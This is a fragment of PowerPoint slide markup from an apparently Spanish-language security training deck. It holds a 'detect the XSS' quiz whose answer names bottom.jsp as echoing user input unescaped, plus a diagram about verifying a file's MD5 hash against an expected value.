                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Juguemos a:</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s-UY" sz="7800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>¡DETECTAR EL XSS!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UY" sz="4400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90189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73D01F-90C3-6647-A718-04D380A25F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="375781"/>
            <a:ext cx="12192000" cy="5866382"/>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2453703"/>
            <a:ext cx="12192000" cy="279024"/>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5636712"/>
            <a:ext cx="12192000" cy="280102"/>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804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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0" err="1"/>
              <a:t>bottom.jsp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t>(La entrada de datos es escrita en la página como es ingresado)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136698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BCF6C-406F-9F4B-85BB-2133B11632AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="293144"/>
            <a:ext cx="12187271" cy="5969870"/>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2453703"/>
            <a:ext cx="12192000" cy="279024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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4729" y="5442558"/>
            <a:ext cx="12192000" cy="280102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF0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454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31F78-340C-833E-1D3F-1B39CCF49956}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;194;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C64A262A-1D14-4D41-83FD-B3883FB050C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838570" y="2943464"/>
            <a:ext cx="1415092" cy="1958867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="123825" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="222A35"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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nvGrpSpPr>
          <p:cNvPr id="6" name="Google Shape;195;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC77260-BE4F-231B-B303-DEE3EC9C98A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204683" y="1675594"/>
            <a:ext cx="870561" cy="1330655"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="870560" cy="1330653"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;196;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B123BD6-44F2-176F-264C-8D7A89AACDA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;197;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49996DE9-503D-41F0-5BF7-C7004C4CCFDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="652919" y="-1"/>
              <a:ext cx="217640" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;198;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE583B6-D561-DF54-BCCA-4038828B503E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="217641"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="21600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Google Shape;199;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00D8894-D62D-13AA-1E18-3F69A766C612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3253660" y="1675594"/>
            <a:ext cx="870561" cy="1330655"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="870560" cy="1330653"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;200;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BB5138-C1D8-23C7-A770-64A7F9F33E29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="44546A"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Google Shape;201;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A88271-3F48-7AAE-B34C-48FC28D654D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="652919" y="-1"/>
              <a:ext cx="217640" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Google Shape;202;p18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20939D7E-6ACD-96EF-0A17-BCB5547A0BE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="217641"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="21600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Google Shape;203;p18" descr="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B35843A-233C-C074-A445-AED786E5E47C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770031" y="1585970"/>
            <a:ext cx="718458" cy="872838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Google Shape;204;p18" descr="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EC7EA0-96D2-2967-86D8-F85A1FE1BC74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163712" y="4695054"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Google Shape;205;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78CFE6DE-84A6-01F4-2EAA-995671726FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376942" y="5654249"/>
            <a:ext cx="533659"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;206;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E40AADA7-79C1-6E39-DC71-043B5DD453DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659069" y="3409522"/>
            <a:ext cx="62871" cy="1355720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="548235"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;207;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D697059B-71D1-4D86-C9E6-6ED3B367296E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949711" y="3076435"/>
            <a:ext cx="1559904" cy="64629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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>seguro</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;208;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DDE1CB6-2A1A-6442-2553-46F0CC5695FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379033" y="4221304"/>
            <a:ext cx="1479424" cy="58473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600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>esperado</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>MD5, 1234</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;209;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F665E60-185B-77E5-85DD-B7222164A686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4347397" y="2368098"/>
            <a:ext cx="2885403" cy="64629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C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>MD5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>esperado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)=1234</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;211;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
